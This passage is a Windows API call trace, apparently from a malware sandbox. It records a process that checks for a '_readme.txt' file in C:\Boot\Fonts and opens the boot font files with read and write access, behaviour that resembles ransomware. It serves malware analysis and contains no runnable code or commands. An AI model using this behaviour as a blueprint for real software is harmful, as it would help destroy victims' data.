0x9c5d1d0 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.188] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0058.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.188] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.188] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.188] PathFindFileNameW (pszPath="") returned="" [0058.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.188] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.188] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.188] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0058.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.188] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5d1d0 [0058.189] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0058.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.189] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0058.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.189] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.189] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.189] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0058.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.189] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0058.189] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.189] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0058.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.189] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0058.189] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.190] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0058.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.190] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0058.190] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.190] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0058.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.191] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0058.191] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.191] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0058.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.191] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0058.191] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.191] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb1f9f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.191] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned=".txt" [0058.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.191] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb1f9f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.191] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.191] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.191] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.195] RtlAllocateHeap 